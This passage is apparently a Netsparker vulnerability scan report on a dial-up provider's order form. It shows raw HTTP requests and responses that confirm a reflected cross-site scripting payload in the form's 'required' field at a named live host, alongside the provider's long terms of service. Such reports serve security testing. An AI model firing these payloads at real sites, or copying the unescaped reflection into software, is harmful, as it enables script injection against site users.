reditCard+Billing+Address=3&billingcity=3&billingstate=3&CreditCard+Billing+ZipCode=3&AGREEMENT=1.+INTRODUCTION%3a%0d%0aDialup+4+Less.com+provides+its+Nationwide+Internet+Access%2c+as+they+may+exist+from+time+to+time+(%22Services%22)%2c+to+users+%0d%0awho+pay+a+quarterly%2c+semi+annual+or+annual+service+fee+to+subscribe+to+the+Services+(%22Members%22).+By+establishing+an+account%2c+you+agree+to+be+bound+by+this+Agreement+and+to+use+%0d%0athe+Services+in+compliance+with+this+Agreement%2c+our+Acceptable+Use+Policy+and+other+policies.%0d%0a%0d%0aIf+you+do+not+agree+to+the+terms+and+conditions+of+this+Agreement%2c+including+any+future+revisions%2c+we+suggest+you+not+use+our+Services.+If+you+are+a+%0d%0acurrent+Member%2c+please+terminate+your+use+of+the+Services+under+Section+6.%0d%0a%0d%0a2.+SUBSCRIPTION+REQUIREMENTS%3a%0d%0aMembers+must+be+at+least+18+years+old.+Local+access+dial-up+numbers+may+not+be+available+in+all+areas.+You+are+solely+responsible+for+determining+if+use+%0d%0aof+a+particular+dial-up+number+will+cause+you+to+incur+long-distance%2c+toll+or+other+charges.+Dialup+4+Less.com+is+not+responsible+for+any+long-distance%2c+%0d%0atoll+or+other+telecommunications+charges+you+incur.+Current+prices+for+Dialup+4+Less.com+Services+are+posted+throughout+our+website+at+%0d%0ahttp%3a%2f%2fwww.dialup4less.com+These+rates+may+also+be+obtained+by+calling+(888)+818-0444+8am+to+6pm+weekdays%2c+Pacific+Standard+Time.+Dialup+4+Less.com+%0d%0areserves+the+right+to+change+prices%2c+policies+and+institute+new+fees+and+or+policies+at+any+time.%0d%0a%0d%0a3.+PAYMENT+OBLIGATIONS+OF+A+MEMBER.%0d%0aA.+Members+must+provide+Dialup+4+Less.com+with+accurate+and+complete+billing+information+including+legal+name%2c+address%2c+telephone+number%2c+and+credit+%0d%0acard%2fbilling+information.+%0d%0a%0d%0aB.+Report+to+Dialup+4+Less.com+all+changes+to+this+information+within+five+(5)+days+of+the+change.+Members+are+responsible+for+any+changes+to+their+%0d%0aaccount.%0d%0a%0d%0aC.+Members+having+questions+regarding+charges+to+an+account%2c+should+contact+Dialup+4+Less's+Billing+Department+at+(888)+818-0444+8am+to+6pm+weekdays+%0d%0aPacific+Standard+Time.%0d%0a%0d%0a4.+CREDIT+CARD+ACCOUNTS%3a+%0d%0aAll+charges+are+automatically+billed+to+the+member's+credit+card+on+the+day+of+sign+up+and+the+first+day+of+each+billing+anniversary+month+from+that+%0d%0apoint+on+until+the+account+is+cancelled.+Once+an+account+is+set+up%2c+all+recurring+billing+will+be+on+the+first+of+the+month.+regardless+of+the+day+they+sign+up.+You+will+be+billed+%0d%0aquarterly+%2c+semi+annual+or+annual+depending+on+the+selection+you+chose+when+you+signed+up.+In+the+event+the+credit+card+is+declined+by+your+Bank%2c+the+customer+will+be+notified+by+email+or+%0d%0aphone+to+the+email%2fphone+number+on+file.+Past+due+accounts+that+are+not+brought+current+within+5+days+of+the+notice+are+subject+to+suspension+and+possible+account+termination.+There+will+be+a+%0d%0a%2420+Re-Activation+Fee+on+any+accounts+suspended+and+then+later+re-activated.+All+payments+are+non-refundable%2c+there+are+no+refunds+expressed+or+%0d%0aimplied+with+this+service.++The+company+listed+on+the+credit+card+statement+will+be+Hosting+4+Less.+Dialup+4+Less.com+will+not+be+responsible+for+any+%0d%0acharges+or+expenses+(e.g+for+overdrawn+accounts%2c+exceeding+credit+card+limits%2c+etc.)+resulting+from+charges+billed+by+Dialup+4+Less.com.%0d%0a%0d%0a5.+TERM+OF+AGREEMENT%3a+%0d%0aContinued+use+of+the+Services+constitutes+acceptance+of+this+Agreement+and+any+future+versions.+If+you+are+dissatisfied+with+the+Services+or+any+related+%0d%0aterms%2c+conditions%2c+rules%2c+policies%2c+guidelines%2c+or+practices%2c+your+sole+and+exclusive+remedy+is+to+discontinue+using+the+Services+by+terminating+your+%0d%0aaccount.%0d%0a%0d%0a6.+CANCELLATION%3a+%0d%0aYou+may+terminate+your+account+at+any+time+and+for+any+reason+by+providing+notice+of+intent+to+terminate+to+Dialup+4+Less.com+by%3a+%0d%0a%0d%0aA.++Fax%3a++Send+a+Fax+In+Writing+To+Dialup+4+Less.com+at+(818)+773-8023+With+Your+UserName+%26+Password.%0d%0a%0d%0aB.+Email%3a+billing%40dialup4less.com.%0d%0a%0d%0aC.+To+protect+you+and+for+security+purposes%2c+all+requests+for+cancellations+or+changes+will+require+your+user+name+and+password.+Dialup+4+Less.com+may+%0d%0aterminate+this+Agreement%2c+your+password%2c+your+account%2c+or+your+use+of+the+Services%2c+for+any+reason%2c+including%2c+without+limitation%2c+if+Dialup+4+Less.com%2c+%0d%0ain+its+sole+discretion%2c+believes+you+have+violated+this+Agreement%2c+our+Acceptable+Use+Policy%2c+or+any+of+the+applicable+user+policies.+Dialup+4+Less.com+%0d%0awill+provide+a+termination+notice+to+you+by%3a+email+addressed+to+your+email+account.+All+notices+to+you+shall+be+deemed+effective+immediately.+Sections+%0d%0a3%2c+9%2c+10%2c+and+12+of+this+Agreement+shall+survive+termination+of+this+Agreement.%0d%0a%0d%0a7.+ACCOUNT%2c+PASSWORD%2c+AND+SECURITY%3a%0d%0aYou+must+keep+your+password+confidential+so+that+no+one+else+may+access+the+Services+through+your+account.+Sharing+your+account+is+prohibited%2c+your+%0d%0aaccount+is+for+your+exclusive+use+only.+You+must+notify+Dialup+4+Less.com+immediately+upon+discovering+any+unauthorized+use+of+your+account.%0d%0a%0d%0a%0d%0a8.+EXTENT+OF+USE%3a+%0d%0aAn+%22Unlimited%22+access+account+does+not+constitute+a+dedicated+connection.+Dialup+4+Less.com+intends+it+to+be+for+an%0d%0aunlimited+amount+of+time+%22manually%22+making+use+of+the+connection+(ie%3a+a+individual+human+being+sitting+at+a+computer).++This+service+is+intended%0d%0afor+reasonable+usage.++Dialup+4+Less.com+employs+a+10+minute+inactivity+%0d%0atimer+as+well+as+a+5+hour+network+cutoff+timer+to+ensure+fair%0d%0aaccess+to+all+customers.+Anyone+attempting+to+remain+on+line+continuously+by+automatically+redialing+after+being+disconnected+may+be+cancelled+in+order+%0d%0ato+protect+our+network+resources+and+maintain+Service+availability+for+%0d%0aothers.%0d%0a%0d%0a9.+EMAIL+USE+AND+SPAM%3a%0d%0aEmail+accounts+are+limited+to+50MB+in+terms+of+storage.++It+is+suggested+that+Emails+be+downloaded+each+time+mail+is+%0d%0afetched+and+stored+on+the+server+for+no+longer+than+60+days.+Dialup+4+Less.com+is+not+responsible+for+any+email+that+is+lost.%0d%0a%0d%0aUsing+a+Dialup+4+Less.com+account+for+the+purposes+of+sending+SPAM+is+prohibited.+Tampering+with+%0d%0athe+return+address+or+route+report+on+an+email+message+or+Usenet+newsgroup+is+prohibited.+Anonymous+transmission+of+any+sort+is+prohibited.%0d%0a%0d%0aSPAM+is+defined+as+any+unwanted+and+unsolicited+transmission+of+data+through+email+and+usenet+newsgroups.+It+includes+but+is+not+limited+to%3a+%0d%0aadvertisements+for+goods+or+services%2c+chain+letters+and+multi-level+marketing%2c+off+topic+postings+to+mailing+lists+or+newsgroups%2c+any+message+sent+to+%0d%0amore+than+5+newsgroups+or+3+list+owners.+%0d%0a%0d%0aAny+violations+will+be+considered+a+breach+of+this+agreement+and+will+result+in+the+immediate+cancellation+of+all+services+without+warning.%0d%0a%0d%0a10.+AVAILABILITY+OF+THE+SERVICES%3a+%0d%0aDialup+4+Less.com+may+change+its+POP+numbers+at+any+time.+Dialup+4+Less.com+reserves+the+right+to+direct+Members+to+use+certain+numbers+to+access+the+%0d%0aService+or+to+restrict+use+of+specific+access+numbers.+User+names%2c+passwords+and+email+addresses+are+Dialup+4+Less's+property+and+Dialup+4+Less.com+may+%0d%0aalter+or+replace+them+at+any+time.%0d%0a%0d%0a%0d%0a11.+PRIVACY+POLICY%3a+%0d%0aDialup+4+Less.com+will+not+give+out+your+email+address+and%2for+personal+information+to+any+3rd+party+entity%2c+with+the+exception+that+if+Dialup+4+Less.com+%0d%0ais+acquired%2c+it+may+have+to+provide+this+information+to+the+purchaser+of+the+business+so+they+can+continue+providing+service+to+you.%0d%0a%0d%0a%0d%0a12.+DISCLAIMER+OF+WARRANTIES+and+LIMITATION+OF+LIABILITY.+EXCEPT+FOR+CERTAIN+PRODUCTS+AND+SERVICES+SPECIFICALLY+IDENTIFIED+AS+BEING+OFFERED+BY+DialUp+4+%0d%0aLess.com.+%0d%0aDialup+4+Less.com+does+not+control+any+materials%2c+information%2c+products%2c+or+services+on+the+internet.+The+internet+contains+unedited+materials%2c+some+of+%0d%0awhich+are+sexually+explicit+or+may+be+offensive+to+you.+Dialup+4+Less.com+has+no+control+over+and+accepts+no+responsibility+for+such+materials.+You+%0d%0aassume+full+responsibility+and+risk+for+use+of+the+services+and+the+internet+and+are+solely+responsible+for+evaluating+the+accuracy%2c+completeness%2c+and+%0d%0ausefulness+of+all+services%2c+products%2c+and+other+information%2c+and+the+quality+and+merchantability+of+all+merchandise+provided+through+the+service+or+the+%0d%0ainternet.%0d%0a%0d%0aThe+services+are+provided+on+an+%22as+is%22+and+%22as+available%22+basis.+Dialup+4+Less.com+does+not+warrant+that+the+services+will+be+uninterrupted%2c+%0d%0aerror-free%2c+or+free+of+viruses+or+other+harmful+components.+Dialup+4+Less.com+makes+no+express+warranties+and+waives+all+implied+warranties+including%2c+%0d%0abut+not+limited+to%2c+warranties+of+title%2c+noninfringement%2c+merchantability%2c+and+fitness+for+a+particular+purpose+regarding+any+merchandise%2c+information+%0d%0aor+service+provided+through+Dialup+4+Less.com+or+the+internet+generally.+No+advice+or+information+given+by+Dialup+4+Less.com+or+its+representatives+%0d%0ashall+create+a+warranty.+Dialup+4+Less.com+and+its+employees+are+not+liable+for+any+costs+or+damages+arising+directly+or+indirectly+from+your+use+of+the+%0d%0aservices+or+the+internet+including+any+indirect%2c+incidental%2c+exemplary%2c+multiple%2c+special%2c+punitive%2c+or+consequential+damages.+In+any+event%2c+DialUp+4+%0d%0aLess's+cumulative+liability+to+any+member+for+any+and+all+claims+relating+to+the+use+of+the+services+shall+not+exceed+the+total+amount+of+service+fees+%0d%0apaid+during+a+one+month+period.%0d%0a%0d%0a13.+Indemnification%3a%0d%0aCustomer+agrees+that+it+shall+defend%2c+indemnify%2c+save+and+hold+Dialup+4+Less+harmless+from+any+and+all+demands%2c+liabilities%2c+losses%2c+costs+and+claims%2c+%0d%0aincluding+reasonable+attorney's+fees+asserted+against+Dialup+4+Less.com%2c+its+agents%2c+its+customers%2c+officers+and+employees%2c+that+may+arise+or+result+%0d%0afrom+any+service+provided+or+performed+or+agreed+to+be+performed+or+any+product+sold+by+customer%2c+its+agents%2c+employees+or+assigns.+Customer+agrees+to+%0d%0adefend%2c+indemnify+and+hold+harmless+Dialup+4+Less.com+against+liabilities+arising+out+of%3a+(1)+Any+injury+to+person+or+property+caused+by+any+products+%0d%0asold+or+otherwise+distributed+in+connection+with+Dialup+4+Less's+server%3b+(2)+Any+material+supplied+by+customer+infringing+or+allegedly+infringing+on+the+%0d%0aproprietary+rights+of+a+third+party%3b+(3)+Copyright+infringement+and+(4)+Any+defective+products+sold+to+customer+from+Dialup+4+Less+'s+server.%0d%0a%0d%0a14.+MISCELLANEOUS%3a+%0d%0aThis+Agreement%2c+and+Dialup+4+Less's+other+user+policies+posted+on+Dialup+4+Less's+Web+site+constitute+the+entire+agreement+between+you+and+Dialup+4+Less.com+with+respect+to+your+use+of+the+Services.%0d%0a%0d%0aDialup+4+Less.com+may+revise%2c+amend%2c+or+modify+this+Agreement%2c+and+any+other+user+policies+and+agreements%2c+at+any+time+and+in+any+manner+without+prior+notice.&INITIALS=3&orderbutton.x=0&orderbutton.y=0

Response

HTTP/1.0 200 OK
Date: Fri, 18 Feb 2011 03:47:00 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 456
Connection: close
Content-Type: text/html


<html> <head> <title>Error: Invalid Submission</title> </head> <center> <table border=0 width=600 bgcolor=#9C9C9C> <tr><th><font size=+2>Error: Invalid Submission</font></th></tr> </table> <table border=0 width=600 bgcolor=#CFCFCF> <tr><td><CENTER>The following required field(s) were invalid or blank in your submission form:<p> <ul> <li>'"--></style></script><script>netsparker(0x0009B3)</script> </ul> These fields must be filled in before you can successfully submit the form.<p> Please use your browser's back button to return to the form <BR> or click <a href="https://secure.hosting4less.com/dialup4less.com/order.html">here</a> for a new blank one. </CENTER> </td></tr> </table> </center> </body></html>
- /dialup4less.com/cgi-bin/order.cgi

/dialup4less.com/cgi-bin/order.cgi CONFIRMED

https://secure.hosting4less.com/dialup4less.com/cgi-bin/order.cgi

Parameters

Parameter Type Value
cour_listfields POST value
cour_top POST Thank you for signing up with Dialup 4 Less.com The following is the information that was filled out on our online order form. You wil be receiving a phone call to verify this order from our company. Please also reply back to this email confirming that the information is correct. Confirmation Info:
html_redirect POST http://www.dialup4less.com/thankyou.html
cour_send POST value
print_blank_fields POST value
required POST '"--></style></script><script>alert(0x000A96)</script>
cour_bottom POST Thank You for choosing Dialup 4 Less.com. We look forward to providing you with the best service possible. You will be receiving your login information in another email shortly. Be advised, all accounts automatically renew until canceled by faxing or emailing us a cancelation notice prior to renewal date.
cour_close POST Sincerely,
cour_myname POST Dialup 4 Less.com
cour_myemail POST order@dialup4less.com
cour_mywebsite POST http://www.dialup4less.com
mail_subject POST Dialup 4 Less.com Account Sign Up
mail_recipient POST order@dialup4less.com
mail_listfields POST value
env_report POST REMOTE_HOST,REMOTE_ADDR,HTTP_USER_AGENT
DESIREDUSERNAME POST Ronald Smith
DESIREDPASSWORD POST 3
TERM POST PLAN: Vacation Dial-Up - Only 1 Month ($19.95 ($9.95/mo) & $10 SETUP FEE)
NAME POST Ronald Smith
ORGANIZATION POST 3
ADDRESS POST 3
CITY POST 3
STATE POST Select a State/province
ZIP POST 3
COUNTRY POST United States
PHONE POST 3
MOBILE-NUMBER POST 3
FAX POST 3
email POST netsparker@example.com
REPRESENTATIVE POST 3
PROMOTION-CODE POST 3
REFERER POST 3
CARD-HOLDER-NAME POST Ronald Smith
CREDIT-CARD-NUMBER POST 3
Credit+Card+Type POST SelectPlan
CREDIT-CARD-EXPIRATION POST selectmonth
CreditCard+Billing+Address POST 3
billingcity POST 3
billingstate POST 3
CreditCard+Billing+ZipCode POST 3
AGREEMENT POST 1. INTRODUCTION: Dialup 4 Less.com provides its Nationwide Internet Access, as they may exist from time to time ("Services"), to users who pay a quarterly, semi annual or annual service fee to subscribe to the Services ("Members"). By establishing an account, you agree to be bound by this Agreement and to use the Services in compliance with this Agreement, our Acceptable Use Policy and other policies. If you do not agree to the terms and conditions of this Agreement, including any future revisions, we suggest you not use our Services. If you are a current Member, please terminate your use of the Services under Section 6. 2. SUBSCRIPTION REQUIREMENTS: Members must be at least 18 years old. Local access dial-up numbers may not be available in all areas. You are solely responsible for determining if use of a particular dial-up number will cause you to incur long-distance, toll or other charges. Dialup 4 Less.com is not responsible for any long-distance, toll or other telecommunications charges you incur. Current prices for Dialup 4 Less.com Services are posted throughout our website at http://www.dialup4less.com These rates may also be obtained by calling (888) 818-0444 8am to 6pm weekdays, Pacific Standard Time. Dialup 4 Less.com reserves the right to change prices, policies and institute new fees and or policies at any time. 3. PAYMENT OBLIGATIONS OF A MEMBER. A. Members must provide Dialup 4 Less.com with accurate and complete billing information including legal name, address, telephone number, and credit card/billing information. B. Report to Dialup 4 Less.com all changes to this information within five (5) days of the change. Members are responsible for any changes to their account. C. Members having questions regarding charges to an account, should contact Dialup 4 Less's Billing Department at (888) 818-0444 8am to 6pm weekdays Pacific Standard Time. 4. CREDIT CARD ACCOUNTS: All charges are automatically billed to the member's credit card on the day of sign up and the first day of each billing anniversary month from that point on until the account is cancelled. Once an account is set up, all recurring billing will be on the first of the month. regardless of the day they sign up. You will be billed quarterly , semi annual or annual depending on the selection you chose when you signed up. In the event the credit card is declined by your Bank, the customer will be notified by email or phone to the email/phone number on file. Past due accounts that are not brought current within 5 days of the notice are subject to suspension and possible account termination. There will be a $20 Re-Activation Fee on any accounts suspended and then later re-activated. All payments are non-refundable, there are no refunds expressed or implied with this service. The company listed on the credit card statement will be Hosting 4 Less. Dialup 4 Less.com will not be responsible for any charges or expenses (e.g for overdrawn accounts, exceeding credit card limits, etc.) resulting from charges billed by Dialup 4 Less.com. 5. TERM OF AGREEMENT: Continued use of the Services constitutes acceptance of this Agreement and any future versions. If you are dissatisfied with the Services or any related terms, conditions, rules, policies, guidelines, or practices, your sole and exclusive remedy is to discontinue using the Services by terminating your account. 6. CANCELLATION: You may terminate your account at any time and for any reason by providing notice of intent to terminate to Dialup 4 Less.com by: A. Fax: Send a Fax In Writing To Dialup 4 Less.com at (818) 773-8023 With Your UserName & Password. B. Email: billing@dialup4less.com. C. To protect you and for security purposes, all requests for cancellations or changes will require your user name and password. Dialup 4 Less.com may terminate this Agreement, your password, your account, or your use of the Services, for any reason, including, without limitation, if Dialup 4 Less.com, in its sole discretion, believes you have violated this Agreement, our Acceptable Use Policy, or any of the applicable user policies. Dialup 4 Less.com will provide a termination notice to you by: email addressed to your email account. All notices to you shall be deemed effective immediately. Sections 3, 9, 10, and 12 of this Agreement shall survive termination of this Agreement. 7. ACCOUNT, PASSWORD, AND SECURITY: You must keep your password confidential so that no one else may access the Services through your account. Sharing your account is prohibited, your account is for your exclusive use only. You must notify Dialup 4 Less.com immediately upon discovering any unauthorized use of your account. 8. EXTENT OF USE: An "Unlimited" access account does not constitute a dedicated connection. Dialup 4 Less.com intends it to be for an unlimited amount of time "manually" making use of the connection (ie: a individual human being sitting at a computer). This service is intended for reasonable usage. Dialup 4 Less.com employs a 10 minute inactivity timer as well as a 5 hour network cutoff timer to ensure fair access to all customers. Anyone attempting to remain on line continuously by automatically redialing after being disconnected may be cancelled in order to protect our network resources and maintain Service availability for others. 9. EMAIL USE AND SPAM: Email accounts are limited to 50MB in terms of storage. It is suggested that Emails be downloaded each time mail is fetched and stored on the server for no longer than 60 days. Dialup 4 Less.com is not responsible for any email that is lost. Using a Dialup 4 Less.com account for the purposes of sending SPAM is prohibited. Tampering with the return address or route report on an email message or Usenet newsgroup is prohibited. Anonymous transmission of any sort is prohibited. SPAM is defined as any unwanted and unsolicited transmission of data through email and usenet newsgroups. It includes but is not limited to: advertisements for goods or services, chain letters and multi-level marketing, off topic postings to mailing lists or newsgroups, any message sent to more than 5 newsgroups or 3 list owners. Any violations will be considered a breach of this agreement and will result in the immediate cancellation of all services without warning. 10. AVAILABILITY OF THE SERVICES: Dialup 4 Less.com may change its POP numbers at any time. Dialup 4 Less.com reserves the right to direct Members to use certain numbers to access the Service or to restrict use of specific access numbers. User names, passwords and email addresses are Dialup 4 Less's property and Dialup 4 Less.com may alter or replace them at any time. 11. PRIVACY POLICY: Dialup 4 Less.com will not give out your email address and/or personal information to any 3rd party entity, with the exception that if Dialup 4 Less.com is acquired, it may have to provide this information to the purchaser of the business so they can continue providing service to you. 12. DISCLAIMER OF WARRANTIES and LIMITATION OF LIABILITY. EXCEPT FOR CERTAIN PRODUCTS AND SERVICES SPECIFICALLY IDENTIFIED AS BEING OFFERED BY DialUp 4 Less.com. Dialup 4 Less.com does not control any materials, information, products, or services on the internet. The internet contains unedited materials, some of which are sexually explicit or may be offensive to you. Dialup 4 Less.com has no control over and accepts no responsibility for such materials. You assume full responsibility and risk for use of the services and the internet and are solely responsible for evaluating the accuracy, completeness, and usefulness of all services, products, and other information, and the quality and merchantability of all merchandise provided through the service or the internet. The services are provided on an "as is" and "as available" basis. Dialup 4 Less.com does not warrant that the services will be uninterrupted, error-free, or free of viruses or other harmful components. Dialup 4 Less.com makes no express warranties and waives all implied warranties including, but not limited to, warranties of title, noninfringement, merchantability, and fitness for a particular purpose regarding any merchandise, information or service provided through Dialup 4 Less.com or the internet generally. No advice or information given by Dialup 4 Less.com or its representatives shall create a warranty. Dialup 4 Less.com and its employees are not liable for any costs or damages arising directly or indirectly from your use of the services or the internet including any indirect, incidental, exemplary, multiple, special, punitive, or consequential damages. In any event, DialUp 4 Less's cumulative liability to any member for any and all claims relating to the use of the services shall not exceed the total amount of service fees paid during a one month period. 13. Indemnification: Customer agrees that it shall defend, indemnify, save and hold Dialup 4 Less harmless from any and all demands, liabilities, losses, costs and claims, including reasonable attorney's fees asserted against Dialup 4 Less.com, its agents, its customers, officers and employees, that may arise or result from any service provided or performed or agreed to be performed or any product sold by customer, its agents, employees or assigns. Customer agrees to defend, indemnify and hold harmless Dialup 4 Less.com against liabilities arising out of: (1) Any injury to person or property caused by any products sold or otherwise distributed in connection with Dialup 4 Less's server; (2) Any material supplied by customer infringing or allegedly infringing on the proprietary rights of a third party; (3) Copyright infringement and (4) Any defective products sold to customer from Dialup 4 Less 's server. 14. MISCELLANEOUS: This Agreement, and Dialup 4 Less's other user policies posted on Dialup 4 Less's Web site constitute the entire agreement between you and Dialup 4 Less.com with respect to your use of the Services. Dialup 4 Less.com may revise, amend, or modify this Agreement, and any other user policies and agreements, at any time and in any manner without prior notice.
INITIALS POST 3

Request

POST /dialup4less.com/cgi-bin/order.cgi HTTP/1.1
Referer: https://secure.hosting4less.com/dialup4less.com/order.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.hosting4less.com
Content-Length: 12835
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

cour_listfields=value&cour_top=Thank+you+for+signing+up+with+Dialup+4+Less.com++The+following+is+%0d%0athe+information+that+was+filled+out+on+our+online+order+form.++You+wil+be+receiving+a+phone+call+to+verify+this+order+from+our+company.%0d%0aPlease+also+reply+back+to+this+email+confirming+that+the+information+is+correct.%0d%0a%0d%0aConfirmation+Info%3a&html_redirect=http%3a%2f%2fwww.dialup4less.com%2fthankyou.html&cour_send=value&print_blank_fields=value&required='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A96)%3c%2fscript%3e&cour_bottom=Thank+You+for+choosing+Dialup+4+Less.com.+We+look+forward+to+providing+you+with+the+best+service+possible.++You+will+be+receiving+your+login+%0d%0ainformation+in+another+email+shortly.++Be+advised%2c+all+accounts+automatically+renew+until+canceled+by+faxing+or+emailing+us+a+cancelation+notice+prior+to+renewal+date.&cour_close=Sincerely%2c&cour_myname=Dialup+4+Less.com&cour_myemail=order%40dialup4less.com&cour_mywebsite=http%3a%2f%2fwww.dialup4less.com&mail_subject=Dialup+4+Less.com+Account+Sign+Up&mail_recipient=order%40dialup4less.com&mail_listfields=value&env_report=REMOTE_HOST%2cREMOTE_ADDR%2cHTTP_USER_AGENT&DESIREDUSERNAME=Ronald+Smith&DESIREDPASSWORD=3&TERM=PLAN%3a+Vacation+Dial-Up+-+Only+1+Month+(%2419.95+(%249.95%2fmo)+%26+%2410+SETUP+FEE)&NAME=Ronald+Smith&ORGANIZATION=3&ADDRESS=3&CITY=3&STATE=Select+a+State%2fprovince&ZIP=3&COUNTRY=United+States&PHONE=3&MOBILE-NUMBER=3&FAX=3&email=netsparker%40example.com&REPRESENTATIVE=3&PROMOTION-CODE=3&REFERER=3&CARD-HOLDER-NAME=Ronald+Smith&CREDIT-CARD-NUMBER=3&Credit+Card+Type=SelectPlan&CREDIT-CARD-EXPIRATION=selectmonth&CreditCard+Billing+Address=3&billingcity=3&billingstate=3&CreditCard+Billing+ZipCode=3&AGREEMENT=1.+INTRODUCTION%3a%0d%0aDialup+4+Less.com+provides+its+Nationwide+Internet+Access%2c+as+they+may+exist+from+time+to+time+(%22Services%22)%2c+to+users+%0d%0awho+pay+a+quarterly%2c+semi+annual+or+annual+service+fee+to+subscribe+to+the+Services+(%22Members%22).+By+establishing+an+account%2c+you+agree+to+be+bound+by+this+Agreement+and+to+use+%0d%0athe+Services+in+compliance+with+this+Agreement%2c+our+Acceptable+Use+Policy+and+other+policies.%0d%0a%0d%0aIf+you+do+not+agree+to+the+terms+and+conditions+of+this+Agreement%2c+including+any+future+revisions%2c+we+suggest+you+not+use+our+Services.+If+you+are+a+%0d%0acurrent+Member%2c+please+terminate+your+use+of+the+Services+under+Section+6.%0d%0a%0d%0a2.+SUBSCRIPTION+REQUIREMENTS%3a%0d%0aMembers+must+be+at+least+18+years+old.+Local+access+dial-up+numbers+may+not+be+available+in+all+areas.+You+are+solely+responsible+for+determining+if+use+%0d%0aof+a+particular+dial-up+number+will+cause+you+to+incur+long-distance%2c+toll+or+other+charges.+Dialup+4+Less.com+is+not+responsible+for+any+long-distance%2c+%0d%0atoll+or+other+telecommunications+charges+you+incur.+Current+prices+for+Dialup+4+Less.com+Services+are+posted+throughout+our+website+at+%0d%0ahttp%3a%2f%2fwww.dialup4less.com+These+rates+may+also+be+obtained+by+calling+(888)+818-0444+8am+to+6pm+weekdays%2c+Pacific+Standard+Time.+Dialup+4+Less.com+%0d%0areserves+the+right+to+change+prices%2c+policies+and+institute+new+fees+and+or+policies+at+any+time.%0d%0a%0d%0a3.+PAYMENT+OBLIGATIONS+OF+A+MEMBER.%0d%0aA.+Members+must+provide+Dialup+4+Less.com+with+accurate+and+complete+billing+information+including+legal+name%2c+address%2c+telephone+number%2c+and+credit+%0d%0acard%2fbilling+information.+%0d%0a%0d%0aB.+Report+to+Dialup+4+Less.com+all+changes+to+this+information+within+five+(5)+days+of+the+change.+Members+are+responsible+for+any+changes+to+their+%0d%0aaccount.%0d%0a%0d%0aC.+Members+having+questions+regarding+charges+to+an+account%2c+should+contact+Dialup+4+Less's+Billing+Department+at+(888)+818-0444+8am+to+6pm+weekdays+%0d%0aPacific+Standard+Time.%0d%0a%0d%0a4.+CREDIT+CARD+ACCOUNTS%3a+%0d%0aAll+charges+are+automatically+billed+to+the+member's+credit+card+on+the+day+of+sign+up+and+the+first+day+of+each+billing+anniversary+month+from+that+%0d%0apoint+on+until+the+account+is+cancelled.+Once+an+account+is+set+up%2c+all+recurring+billing+will+be+on+the+first+of+the+month.+regardless+of+the+day+they+sign+up.+You+will+be+billed+%0d%0aquarterly+%2c+semi+annual+or+annual+depending+on+the+selection+you+chose+when+you+signed+up.+In+the+event+the+credit+card+is+declined+by+your+Bank%2c+the+customer+will+be+notified+by+email+or+%0d%0aphone+to+the+email%2fphone+number+on+file.+Past+due+accounts+that+are+not+brought+current+within+5+days+of+the+notice+are+subject+to+suspension+and+possible+account+termination.+There+will+be+a+%0d%0a%2420+Re-Activation+Fee+on+any+accounts+suspended+and+then+later+re-activated.+All+payments+are+non-refundable%2c+there+are+no+refunds+expressed+or+%0d%0aimplied+with+this+service.++The+company+listed+on+the+credit+card+statement+will+be+Hosting+4+Less.+Dialup+4+Less.com+will+not+be+responsible+for+any+%0d%0acharges+or+expenses+(e.g+for+overdrawn+accounts%2c+exceeding+credit+card+limits%2c+etc.)+resulting+from+charges+billed+by+Dialup+4+Less.com.%0d%0a%0d%0a5.+TERM+OF+AGREEMENT%3a+%0d%0aContinued+use+of+the+Services+constitutes+acceptance+of+this+Agreement+and+any+future+versions.+If+you+are+dissatisfied+with+the+Services+or+any+related+%0d%0aterms%2c+conditions%2c+rules%2c+policies%2c+guidelines%2c+or+practices%2c+your+sole+and+exclusive+remedy+is+to+discontinue+using+the+Services+by+terminating+your+%0d%0aaccount.%0d%0a%0d%0a6.+CANCELLATION%3a+%0d%0aYou+may+terminate+your+account+at+any+time+and+for+any+reason+by+providing+notice+of+intent+to+terminate+to+Dialup+4+Less.com+by%3a+%0d%0a%0d%0aA.++Fax%3a++Send+a+Fax+In+Writing+To+Dialup+4+Less.com+at+(818)+773-8023+With+Your+UserName+%26+Password.%0d%0a%0d%0aB.+Email%3a+billing%40dialup4less.com.%0d%0a%0d%0aC.+To+protect+you+and+for+security+purposes%2c+all+requests+for+cancellations+or+changes+will+require+your+user+name+and+password.+Dialup+4+Less.com+may+%0d%0aterminate+this+Agreement%2c+your+password%2c+your+account%2c+or+your+use+of+the+Services%2c+for+any+reason%2c+including%2c+without+limitation%2c+if+Dialup+4+Less.com%2c+%0d%0ain+its+sole+discretion%2c+believes+you+have+violated+this+Agreement%2c+our+Acceptable+Use+Policy%2c+or+any+of+the+applicable+user+policies.+Dialup+4+Less.com+%0d%0awill+provide+a+termination+notice+to+you+by%3a+email+addressed+to+your+email+account.+All+notices+to+you+shall+be+deemed+effective+immediately.+Sections+%0d%0a3%2c+9%2c+10%2c+and+12+of+this+Agreement+shall+survive+termination+of+this+Agreement.%0d%0a%0d%0a7.+ACCOUNT%2c+PASSWORD%2c+AND+SECURITY%3a%0d%0aYou+must+keep+your+password+confidential+so+that+no+one+else+may+access+the+Services+through+your+account.+Sharing+your+account+is+prohibited%2c+your+%0d%0aaccount+is+for+your+exclusive+use+only.+You+must+notify+Dialup+4+Less.com+immediately+upon+discovering+any+unauthorized+use+of+your+account.%0d%0a%0d%0a%0d%0a8.+EXTENT+OF+USE%3a+%0d%0aAn+%22Unlimited%22+access+account+does+not+constitute+a+dedicated+connection.+Dialup+4+Less.com+intends+it+to+be+for+an%0d%0aunlimited+amount+of+time+%22manually%22+making+use+of+the+connection+(ie%3a+a+individual+human+being+sitting+at+a+computer).++This+service+is+intended%0d%0afor+reasonable+usage.++Dialup+4+Less.com+employs+a+10+minute+inactivity+%0d%0atimer+as+well+as+a+5+hour+network+cutoff+timer+to+ensure+fair%0d%0aaccess+to+all+customers.+Anyone+attempting+to+remain+on+line+continuously+by+automatically+redialing+after+being+disconnected+may+be+cancelled+in+order+%0d%0ato+protect+our+network+resources+and+maintain+Service+availability+for+%0d%0aothers.%0d%0a%0d%0a9.+EMAIL+USE+AND+SPAM%3a%0d%0aEmail+accounts+are+limited+to+50MB+in+terms+of+storage.++It+is+suggeste